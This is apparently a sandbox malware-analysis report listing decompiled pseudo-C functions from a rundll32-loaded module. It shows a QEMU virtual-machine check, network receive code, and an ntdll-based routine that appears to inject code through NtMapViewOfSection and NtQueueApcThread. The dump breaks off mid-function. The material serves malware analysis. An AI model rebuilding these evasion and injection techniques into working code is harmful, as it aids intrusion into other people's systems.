                • Instruction Fuzzy Hash: 4361CF73602A51C6EF348F21E5847A9B3E1FBE4740F208165DF9A8B798DB38E951C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF080 Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 36%
                			E00000215215205CF080(void* __rax, long long __rbx, long long __rsi, char _a8, long long _a16, long long _a24) {
				void* __rdi;
				intOrPtr _t20;
				long long _t25;
				void* _t30;
				void* _t34;
				void* _t41;

				_t32 = __rsi;
				_t25 = __rbx;
				_a24 = __rbx;
				_a8 = 0;
				E00000215215205D0670(0x52534d42, 0, _t34,  &_a8);
				if (__rax == 0) goto 0x205cf0f6;
				_a16 = __rsi;
				_t20 = _a8;
				r9d = _t20;
				if (E00000215215205D0570(__rax, __rbx, "qemu", _t30, __rax, __rsi, _t34, __rax, _t41) != 0) goto 0x205cf0e4;
				r9d = _t20;
				if (E00000215215205D0570(E00000215215205D0570(__rax, __rbx, "qemu", _t30, __rax, __rsi, _t34, __rax, _t41), _t25, "QEMU", _t30, __rax, _t32, _t34, __rax, _t41) == 0) goto 0x205cf0e9;
				0x205faea4();
				return 1;
			}









                0x215205cf080
                0x215205cf080
                0x215205cf080
                0x215205cf093
                0x215205cf09c
                0x215205cf0a7
                0x215205cf0a9
                0x215205cf0b1
                0x215205cf0bc
                0x215205cf0c9
                0x215205cf0cb
                0x215205cf0e2
                0x215205cf0ec
                0x215205cf102

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: BMSR$QEMU$qemu
                • API String ID: 0-2187671315
                • Opcode ID: 16cc9900deff68e23b318fd9eb873e914e0238ac6f3777cc6376dae7b2047408
                • Instruction ID: 8c05e050ebd75aaf072e556eafe7fdf0e0460a3198680117fe3d7674a7647b97
                • Opcode Fuzzy Hash: 16cc9900deff68e23b318fd9eb873e914e0238ac6f3777cc6376dae7b2047408
                • Instruction Fuzzy Hash: EF01F733312A90C2EB50DB52F1886E96790EFE8BC4F045066BF465BB4EEA34C904C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060CB80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 15%
                			E000002152152060CB80(void* __edx, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t20;
				long long* _t25;
				long long* _t41;
				void* _t49;
				void* _t50;

				_t25 = _t41;
				 *((long long*)(_t25 + 8)) = __rbx;
				 *((long long*)(_t25 + 0x10)) = __rbp;
				 *((long long*)(_t25 + 0x18)) = __rsi;
				 *((long long*)(_t25 + 0x20)) = __rdi;
				_t20 = r9d;
				_t50 = __rcx;
				E000002152152060C60C(0xd, __rbx, "GetLocaleInfoEx", __r8, 0x20634518, 0x20634520);
				if (_t25 == 0) goto 0x2060cbe3;
				 *0x20627698();
				r9d = _t20;
				 *_t25();
				goto 0x2060cbfd;
				E000002152152060CFFC(0, 0, _t25, _t25, _t50, __r8, _t49);
				r9d = _t20;
				return GetLocaleInfoW(??, ??, ??, ??);
			}








                0x2152060cb80
                0x2152060cb83
                0x2152060cb87
                0x2152060cb8b
                0x2152060cb8f
                0x2152060cb99
                0x2152060cba8
                0x2152060cbbe
                0x2152060cbc9
                0x2152060cbce
                0x2152060cbd4
                0x2152060cbdf
                0x2152060cbe1
                0x2152060cbe8
                0x2152060cbef
                0x2152060cc17

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: GetLocaleInfoEx
                • API String ID: 2299586839-2904428671
                • Opcode ID: a0d5fb43beda45df5dbd3d69508ff1f01683c1bc917df208328e2df5b01cd096
                • Instruction ID: b4e1698151c96fbcd2fa90c120d0f8e05fd9fabaa8173941800dc4b660773a51
                • Opcode Fuzzy Hash: a0d5fb43beda45df5dbd3d69508ff1f01683c1bc917df208328e2df5b01cd096
                • Instruction Fuzzy Hash: 6001D832712F64C6E6249F57A4046C5B7A6FFE8FD0F244056DE0913B59DE38E546C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520592270 Relevance: 3.2, APIs: 2, Instructions: 212networkCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 61%
                			E0000021521520592270(void* __eax, void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long _a8, unsigned long long _a24, unsigned long long _a32, signed int* _a40) {
				long long _v56;
				unsigned long long _v64;
				unsigned long long _v72;
				long long _v88;
				long long _v96;
				long long _v104;
				unsigned long long _t66;
				void* _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				void* _t123;
				unsigned long long _t142;
				unsigned long long _t149;
				unsigned long long _t155;
				unsigned long long _t169;
				void* _t172;
				signed int* _t175;
				signed long long _t181;
				signed long long _t185;
				unsigned long long _t193;
				unsigned long long _t194;
				unsigned long long _t195;
				unsigned long long _t198;
				void* _t205;
				void* _t206;
				long long _t210;

				_t109 = __ecx;
				_a8 = __rbx;
				_a32 = r9d;
				r15d = 0;
				_t142 =  &_a24;
				_v88 = _t210;
				_v96 = _t210;
				_v104 = _t142;
				_a32 = r15d;
				_a24 = r15d;
				__imp__WSARecv();
				_t123 = __eax;
				_t66 = E000002152152058F380(__rcx, __rdx);
				_t193 = _t142;
				__imp__#111();
				_v72 = _t142;
				_v64 = _t142;
				if ( *((intOrPtr*)(_t193 + 8)) + 0xda812030 - 1 <= 0) goto 0x205922f1;
				 *((intOrPtr*)( *_t193 + 0x30))();
				goto 0x205922f6;
				_v72 = _t66;
				_t175 = _a40;
				_v64 = _t193;
				asm("movups xmm0, [ebp-0x20]");
				_v56 = _t142 + 2;
				asm("movsd xmm1, [ebp-0x10]");
				asm("movups [ebx], xmm0");
				asm("movsd [ebx+0x10], xmm1");
				if (_t175[4] == 1) goto 0x20592335;
				goto 0x2059235f;
				_t181 = _t175[2];
				_t149 = (_t181 - __rdx >> 1) + __rdx >> 0x14;
				_t110 = _t109 -  *_t175 * _t181 * 0x1ffff7;
				if (_t110 * 0x3e8 +  *_t175 != 0x40) goto 0x205923a6;
				E000002152152058F380(_t181, __rdx);
				_t194 = _t149;
				_v72 = _t149;
				_v64 = _t149;
				if ( *((intOrPtr*)(_t194 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059239b;
				_t205 =  *_t194;
				 *((intOrPtr*)(_t205 + 0x30))();
				_v72 = 0x2746;
				goto 0x2059241a;
				_v72 = 0x2746;
				goto 0x2059241a;
				if (_t205 == 1) goto 0x205923b0;
				goto 0x205923da;
				_t185 = _t175[2];
				_t155 = (_t185 - __rdx >> 1) + __rdx >> 0x14;
				_t111 = _t110 -  *_t175 * _t185 * 0x1ffff7;
				if (_t111 * 0x3e8 +  *_t175 != 0x4d2) goto 0x2059243c;
				E000002152152058F380(_t185, __rdx);
				_t195 = _t155;
				_v72 = _t155;
				_v64 = _t155;
				if ( *((intOrPtr*)(_t195 + 8)) + 0xda812030 - 1 <= 0) goto 0x20592411;
				_t206 =  *_t195;
				 *((intOrPtr*)(_t206 + 0x30))();
				goto 0x20592413;
				_v72 = 0x274d;
				_v64 = _t195;
				asm("movups xmm0, [ebp-0x20]");
				_v56 = _t155 + 2;
				asm("movsd xmm1, [ebp-0x10]");
				asm("movups [ebx], xmm0");
				asm("movsd [ebx+0x10], xmm1");
				goto 0x205924b2;
				if (_t206 == 1) goto 0x20592446;
				goto 0x20592470;
				_t112 = _t111 -  *_t175 * _t175[2] * 0x1ffff7;
				if (_t112 * 0x3e8 +  *_t175 == 0x2738) goto 0x205924bb;
				if (_t206 == 1) goto 0x20592481;
				goto 0x205924ab;
				if ((_t112 -  *_t175 * _t175[2] * 0x1ffff7) * 0x3e8 +  *_t175 == 0xea) goto 0x205924bb;
				if (_t123 == 0) goto 0x205924bb;
				goto 0x2059252f;
				_t169 = _t175[4];
				if (_t169 != 0) goto 0x205924ce;
				E000002152152058F380(_t175[2], __rdx);
				goto 0x205924e2;
				if (_t169 != 1) goto 0x205924de;
				E000002152152058FD30(_t175[2], __rdx);
				goto 0x205924e2;
				_t198 = _t175[2];
				_v72 = _t169;
				_v64 = _t169;
				if ( *((intOrPtr*)(_t198 + 8)) + 0xda812030 - 1 <= 0) goto 0x20592506;
				_t172 =  *_t198;
				 *((intOrPtr*)(_t172 + 0x30))();
				goto 0x20592508;
				_v72 = r15d;
				_v56 = _t172 + 2;
				asm("movsd xmm1, [ebp-0x10]");
				_v64 = _t198;
				asm("movups xmm0, [ebp-0x20]");
				asm("movups [ebx], xmm0");
				asm("movsd [ebx+0x10], xmm1");
				return _a32;
			}






























                0x21520592270
                0x21520592270
                0x21520592275
                0x21520592288
                0x2152059228b
                0x2152059228f
                0x21520592298
                0x2152059229d
                0x215205922a2
                0x215205922a6
                0x215205922aa
                0x215205922b0
                0x215205922b2
                0x215205922b7
                0x215205922ba
                0x215205922d5
                0x215205922d9
                0x215205922e1
                0x215205922eb
                0x215205922ef
                0x215205922f6
                0x21520592303
                0x2152059230e
                0x21520592312
                0x21520592316
                0x2152059231a
                0x2152059231f
                0x21520592322
                0x2152059232f
                0x21520592333
                0x21520592335
                0x2152059234b
                0x21520592355
                0x21520592362
                0x21520592364
                0x21520592369
                0x2152059236e
                0x21520592372
                0x21520592381
                0x21520592383
                0x2152059238e
                0x21520592392
                0x21520592399
                0x2152059239d
                0x215205923a4
                0x215205923aa
                0x215205923ae
                0x215205923b0
                0x215205923c6
                0x215205923d0
                0x215205923df
                0x215205923e1
                0x215205923e6
                0x215205923eb
                0x215205923ef
                0x215205923fe
                0x21520592400
                0x2152059240b
                0x2152059240f
                0x21520592413
                0x2152059241d
                0x21520592425
                0x21520592429
                0x2152059242d
                0x21520592432
                0x21520592435
                0x2152059243a
                0x21520592440
                0x21520592444
                0x21520592466
                0x21520592475
                0x2152059247b
                0x2152059247f
                0x215205924b0
                0x215205924b4
                0x215205924b9
                0x215205924bb
                0x215205924c2
                0x215205924c4
                0x215205924cc
                0x215205924d2
                0x215205924d4
                0x215205924dc
                0x215205924de
                0x215205924e4
                0x215205924e8
                0x215205924f7
                0x215205924f9
                0x21520592501
                0x21520592504
                0x2152059250f
                0x21520592513
                0x21520592517
                0x2152059251f
                0x21520592523
                0x21520592527
                0x2152059252a
                0x21520592542

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastRecv
                • String ID:
                • API String ID: 904507345-0
                • Opcode ID: 5ae351c8fb2f803753a3d141a4413ee28ef43bae491a8bcf9652c8dbddf81f5b
                • Instruction ID: a877514e715af296757682adfe24b98697a7fd4ed2c8ec8062b184a42a3c35ae
                • Opcode Fuzzy Hash: 5ae351c8fb2f803753a3d141a4413ee28ef43bae491a8bcf9652c8dbddf81f5b
                • Instruction Fuzzy Hash: E281AC73B12F58CAEF14CF75D5892AC23A4FBA9788F104525CE4D97788DB38D1918780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520611DB4 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E0000021521520611DB4(void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v264;
				signed int _t22;
				signed int _t23;
				void* _t25;
				signed int _t33;
				signed long long _t52;
				signed long long _t53;
				void* _t55;
				signed int* _t66;
				intOrPtr* _t68;
				void* _t70;
				void* _t75;

				_t57 = __rcx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t52 =  *0x2067c720; // 0xca1645d940e
				_t53 = _t52 ^ _t70 - 0x00000120;
				_v24 = _t53;
				_t55 = __rcx;
				E000002152152060C334(_t53, __rcx, __rcx, __rdx, _t75);
				_t4 = _t53 + 0x98; // 0x98
				_t68 = _t4;
				E000002152152060C334(_t53, _t55, _t57, __rdx, _t75);
				_t66 =  *((intOrPtr*)(_t53 + 0x3a0));
				_t22 = E0000021521520611EB0(_t55, __rdx);
				r9d = 0x78;
				_t33 = _t22;
				asm("sbb edx, edx");
				_t23 = GetLocaleInfoW(??, ??, ??, ??);
				if (_t23 != 0) goto 0x20611e30;
				 *_t66 =  *_t66 & _t23;
				goto 0x20611e8b;
				_t25 = E00000215215206019F0(_t53,  *_t68,  &_v264);
				if (_t25 != 0) goto 0x20611e4b;
				if ( *((intOrPtr*)(_t68 + 0x18)) != _t25) goto 0x20611e78;
				goto 0x20611e6a;
				if ( *((intOrPtr*)(_t68 + 0x18)) != 0) goto 0x20611e81;
				if ( *((intOrPtr*)(_t68 + 0x14)) == 0) goto 0x20611e81;
				if (E00000215215206019F0(_t53,  *_t68,  &_v264) != 0) goto 0x20611e81;
				if (E0000021521520611FB0(_t33, 0, _t53, _t55,  *_t68,  &_v264, _t68, _t75) == 0) goto 0x20611e81;
				 *_t66 =  *_t66 | 0x00000004;
				_t66[1] = _t33;
				_t66[2] = _t33;
				return E00000215215205F59D0(_t33, _v24 ^ _t70 - 0x00000120,  &_v264, _t75);
			}

















                0x21520611db4
                0x21520611db4
                0x21520611db9
                0x21520611dc6
                0x21520611dcd
                0x21520611dd0
                0x21520611dd8
                0x21520611ddb
                0x21520611de0
                0x21520611de0
                0x21520611de7
                0x21520611def
                0x21520611df6
                0x21520611e05
                0x21520611e0d
                0x21520611e0f
                0x21520611e1d
                0x21520611e25
                0x21520611e27
                0x21520611e2e
                0x21520611e38
                0x21520611e3f
                0x21520611e44
                0x21520611e49
                0x21520611e4f
                0x21520611e55
                0x21520611e66
                0x21520611e76
                0x21520611e78
                0x21520611e7b
                0x21520611e7e
                0x21520611eaf

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$InfoLocaleabort
                • String ID:
                • API String ID: 3293382891-0
                • Opcode ID: c3ee6eff638805c46cfdc8a03d65015ce6c4ae2625ed1d2e05411732f31b83ad
                • Instruction ID: 43878149dc92cf33e0ed6a23aa57ecb31ba8d30ea3a363e3afe4989111a03895
                • Opcode Fuzzy Hash: c3ee6eff638805c46cfdc8a03d65015ce6c4ae2625ed1d2e05411732f31b83ad
                • Instruction Fuzzy Hash: 7D21A233601A90CAEF34CB21E4493DAB7A1FBE8780F6481659F898779ADF38E545C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520611A08 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 45%
                			E0000021521520611A08(void* __ecx, void* __edx, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, signed int __r8, void* __r9, long long _a8) {
				signed int _t35;
				signed char _t36;
				signed char _t37;
				signed int _t52;
				void* _t54;
				signed int* _t58;
				signed short** _t65;
				signed long long _t70;
				signed long long _t71;
				signed long long _t74;

				_t54 = __rax;
				_a8 = __rbx;
				_t58 = __rcx;
				E000002152152060C334(__rax, __rcx, __rcx, __rdx, __r9);
				_t70 = __r8 | 0xffffffff;
				_t2 = _t54 + 0x98; // 0x98
				_t65 = _t2;
				_t74 = _t70 + 1;
				if (( *_t65)[_t74] != 0) goto 0x20611a2d;
				_t65[3] = 0 | _t74 == 0x00000003;
				_t71 = _t70 + 1;
				if (_t65[1][_t71] != 0) goto 0x20611a47;
				r8d = 2;
				_t65[3] = 0 | _t71 == 0x00000003;
				_t58[1] = 0;
				if (_t65[3] != 0) goto 0x20611a96;
				r10d = 0;
				r9d =  *( *_t65) & 0x0000ffff;
				_t16 = _t74 - 0x41; // 0x58
				if (_t16 - 0x19 <= 0) goto 0x20611a8e;
				r9w = r9w - 0x61;
				if (r9w - 0x19 > 0) goto 0x20611a93;
				r10d =  &(r10d[0]);
				goto 0x20611a71;
				r8d = r10d;
				_t65[2] = r8d;
				_t35 = EnumSystemLocalesW(??, ??);
				_t52 =  *_t58 & 0x00000007;
				asm("bt ecx, 0x9");
				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
				asm("bt ecx, 0x8");
				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x20611aca;
				 *_t58 = 0;
				return _t37;
			}













                0x21520611a08
                0x21520611a08
                0x21520611a12
                0x21520611a15
                0x21520611a1a
                0x21520611a23
                0x21520611a23
                0x21520611a2d
                0x21520611a35
                0x21520611a40
                0x21520611a47
                0x21520611a4f
                0x21520611a57
                0x21520611a60
                0x21520611a63
                0x21520611a69
                0x21520611a6e
                0x21520611a71
                0x21520611a78
                0x21520611a80
                0x21520611a82
                0x21520611a8c
                0x21520611a8e
                0x21520611a91
                0x21520611a93
                0x21520611a96
                0x21520611aa6
                0x21520611aae
                0x21520611ab4
                0x21520611ab8
                0x21520611abd
                0x21520611ac1
                0x21520611ac6
                0x21520611ac8
                0x21520611ad4

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystemabort
                • String ID:
                • API String ID: 2459050469-0
                • Opcode ID: 3457bfe5fcbd0153a9a04b2b83fc745b7509e318b3cd9a85cf16f6d4b318fbfc
                • Instruction ID: bac32ea983ef18481b11184b5c66dfad5e406cc36c4f32ba56cf948bbdba7dc0
                • Opcode Fuzzy Hash: 3457bfe5fcbd0153a9a04b2b83fc745b7509e318b3cd9a85cf16f6d4b318fbfc
                • Instruction Fuzzy Hash: 3F11E177A16A54CAEF248F26D0447E8BBA1FBA0FE0F648116CA25473C8DA34D6D1C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520611FB0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 32%
                			E0000021521520611FB0(void* __ecx, void* __edx, signed long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, intOrPtr _a8, long long _a16, long long _a24) {
				int _t13;
				void* _t15;
				void* _t17;
				void* _t26;
				signed long long _t34;
				signed short* _t51;

				_t34 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t26 = __edx;
				_t17 = __ecx;
				E000002152152060C334(__rax, __rbx, __rcx, __rdx, __r9);
				r9d = 2;
				asm("bts ecx, 0xa");
				_t13 = GetLocaleInfoW(??, ??, ??, ??);
				r10d = 0;
				if (_t13 != 0) goto 0x20611ff8;
				goto 0x2061204b;
				if (_t17 == _a8) goto 0x20612046;
				if (_t26 == 0) goto 0x20612046;
				_t51 =  *((intOrPtr*)(_t34 + 0x98));
				r8d = r10d;
				_t15 = __rdx - 0x41;
				if (_t15 - 0x19 <= 0) goto 0x20612027;
				if (( *_t51 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x20612033;
				r8d = r8d + 1;
				goto 0x20612014;
				if (_t51[(_t34 | 0xffffffff) + 1] != r10w) goto 0x20612037;
				if (r8d == _t15) goto 0x20611ff4;
				return 1;
			}









                0x21520611fb0
                0x21520611fb0
                0x21520611fb5
                0x21520611fbf
                0x21520611fc1
                0x21520611fc3
                0x21520611fd5
                0x21520611fdb
                0x21520611fe7
                0x21520611fed
                0x21520611ff2
                0x21520611ff6
                0x21520611ffc
                0x21520612000
                0x21520612002
                0x21520612009
                0x21520612014
                0x2152061201b
                0x21520612025
                0x2152061202a
                0x21520612031
                0x2152061203f
                0x21520612044
                0x2152061205a

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$InfoLocaleabort
                • String ID:
                • API String ID: 3293382891-0
                • Opcode ID: b6937d58de1b3fddba4942bf8e23c18979a53f8c02c17deea7c1570699fd8b7a
                • Instruction ID: 64371b57e730b7ea70ec4e7919892f7a00847a70f6d278091985baddfd80838b
                • Opcode Fuzzy Hash: b6937d58de1b3fddba4942bf8e23c18979a53f8c02c17deea7c1570699fd8b7a
                • Instruction Fuzzy Hash: 8F115C336159B1C6EF74971290487EDA2A1FBE47A4F604221DE35077CCD735E891CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060C574 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: EnumLocalesSystem
                • String ID:
                • API String ID: 2099609381-0
                • Opcode ID: 95cb4c8792f31e9588550a23d261f1c3d45a3fd0a0baf515abd1c6778a738204
                • Instruction ID: 57748f895afbf65443518ae1073fab28c4ddadb315adecbaaed1acfa25edf964
                • Opcode Fuzzy Hash: 95cb4c8792f31e9588550a23d261f1c3d45a3fd0a0baf515abd1c6778a738204
                • Instruction Fuzzy Hash: 3801AD73311F5483E714CB25E8941DA7362FBE8BC0F148065EE484776CDB38D8558740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520611AD8 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 53%
                			E0000021521520611AD8(void* __ecx, void* __edx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, signed int __r8, long long _a8) {
				signed int _t15;
				int _t17;
				void* _t30;
				signed char* _t32;
				signed short* _t37;
				signed long long _t44;
				void* _t45;
				void* _t46;

				_t30 = __rax;
				_a8 = __rbx;
				_t32 = __rcx;
				E000002152152060C334(__rax, __rcx, __rcx, __rdx, _t45);
				_t46 = _t30;
				_t37 =  *((intOrPtr*)(_t30 + 0x98));
				_t44 = (__r8 | 0xffffffff) + 1;
				if (_t37[_t44] != 0) goto 0x20611afa;
				_t15 = 0 | _t44 == 0x00000003;
				 *(_t46 + 0xb0) = _t15;
				if (_t15 != 0) goto 0x20611b45;
				r9d = 0;
				r8d =  *_t37 & 0x0000ffff;
				if (_t44 - 0x41 - 0x19 <= 0) goto 0x20611b3d;
				r8w = r8w - 0x61;
				if (r8w - 0x19 > 0) goto 0x20611b42;
				r9d = r9d + 1;
				goto 0x20611b20;
				 *((intOrPtr*)(_t46 + 0xac)) = r9d;
				_t17 = EnumSystemLocalesW(??, ??);
				if (( *_t32 & 0x00000004) != 0) goto 0x20611b65;
				 *_t32 = 0;
				return _t17;
			}











                0x21520611ad8
                0x21520611ad8
                0x21520611ae2
                0x21520611ae5
                0x21520611aee
                0x21520611af3
                0x21520611afa
                0x21520611b02
                0x21520611b0f
                0x21520611b12
                0x21520611b1b
                0x21520611b1d
                0x21520611b20
                0x21520611b2f
                0x21520611b31
                0x21520611b3b
                0x21520611b3d
                0x21520611b40
                0x21520611b45
                0x21520611b58
                0x21520611b61
                0x21520611b63
                0x21520611b6f

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystemabort
                • String ID:
                • API String ID: 2459050469-0
                • Opcode ID: 787a6c22c84e53a79aaf685c1252849c09613f5819060104d813ef90c67a9d76
                • Instruction ID: 200f1755c497ba8d27a35cd57e54d05cf2cef0b2507e910d028a1ebe8a52e29a
                • Opcode Fuzzy Hash: 787a6c22c84e53a79aaf685c1252849c09613f5819060104d813ef90c67a9d76
                • Instruction Fuzzy Hash: 9401D873709A94C6EB244F15E4447D9B6E1EFE0BA4F61C261DA254B7C8DB7494858700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520587AE0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 108libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E0000021521520587AE0(long long* __rax, void* __rcx, void* __rdx, void* __r8, long long __r13, char _a8, char _a24, char _a32) {
				long long _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t35;
				void* _t49;
				void* _t50;
				void* _t51;
				long long* _t60;
				void* _t94;
				void* _t103;

				_t94 = __rdx;
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0x20587aff;
				goto 0x20587b02;
				_t103 = __r8;
				r15d =  *((intOrPtr*)(__r8 + 0x10));
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				 *__rax();
				 *__rax();
				if (__rcx == 0) goto 0x20587c94;
				_v56 = __r13;
				r13d = 0;
				_a8 = __r13;
				_a32 = __r13;
				_v72 = __r13;
				if (E00000215215205CAB8C(r15d, __rax, __rax,  &_a32, __rax, __rdx,  &_a8) != 0) goto 0x20587c2c;
				_v64 = __r13;
				_a24 = __r13;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				_v80 = 0x40;
				_v88 = r13d;
				_v96 = 2;
				r9d = 0;
				_v104 =  &_v64;
				_t60 =  &_a24;
				_v112 = _t60;
				_v120 = __r13;
				_t35 =  *__rax();
				if ( *__rax() != 0) goto 0x20587c2c;
				r8d = r15d;
				E00000215215205F7310(_t35, _t49, _t50, _t51, _a32, _t103, __rax, _t94,  &_v72);
				if (_t94 == 0) goto 0x20587c6f;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				r9d = 0;
				_v120 = r13d;
				r8d = 0;
				 *_t60();
				CloseHandle(??);
				CloseHandle(??);
				CloseHandle(??);
				CloseHandle(??);
				return 1;
			}






















                0x21520587af2
                0x21520587af8
                0x21520587afd
                0x21520587aff
                0x21520587b02
                0x21520587b0d
                0x21520587b20
                0x21520587b33
                0x21520587b3c
                0x21520587b40
                0x21520587b45
                0x21520587b4b
                0x21520587b58
                0x21520587b66
                0x21520587b6e
                0x21520587b76
                0x21520587b82
                0x21520587b8f
                0x21520587b94
                0x21520587b9c
                0x21520587baf
                0x21520587bc2
                0x21520587bd5
                0x21520587be0
                0x21520587bea
                0x21520587bf2
                0x21520587bf5
                0x21520587bfd
                0x21520587c05
                0x21520587c0a
                0x21520587c0f
                0x21520587c17
                0x21520587c21
                0x21520587c27
                0x21520587c2f
                0x21520587c38
                0x21520587c4d
                0x21520587c53
                0x21520587c56
                0x21520587c5b
                0x21520587c64
                0x21520587c69
                0x21520587c77
                0x21520587c80
                0x21520587c89
                0x21520587ca2

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Handle$AddressProc$Close$Module
                • String ID: @$NtMapViewOfSection$NtQueueApcThread$NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 2187694145-438560624
                • Opcode ID: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction ID: a7a4ea7fd352374849bde3e2fedbc05238ebba79ed18282f4ad3bdbfbbf6f91d
                • Opcode Fuzzy Hash: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction Fuzzy Hash: 82415877306FA4CAEB609B21B85878A7360FBE9B94F544051DE4E03768EF78C549C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CC700 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 385comlibraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 29%
                			E00000215215205CC700(void* __eax, signed int __ecx, void* __esi, long long __rbx, char* __rcx, intOrPtr* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* _t181;
				void* _t184;
				intOrPtr _t241;
				intOrPtr _t243;
				intOrPtr _t246;
				intOrPtr _t248;
				long long* _t249;
				long long* _t250;
				char* _t261;
				intOrPtr _t266;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr _t272;
				void* _t273;
				intOrPtr* _t277;
				intOrPtr* _t288;
				intOrPtr* _t290;
				intOrPtr* _t306;
				void* _t321;
				short* _t322;
				intOrPtr* _t327;
				intOrPtr* _t328;
				void* _t330;
				long long* _t332;
				void* _t334;
				signed long long _t336;
				void* _t341;
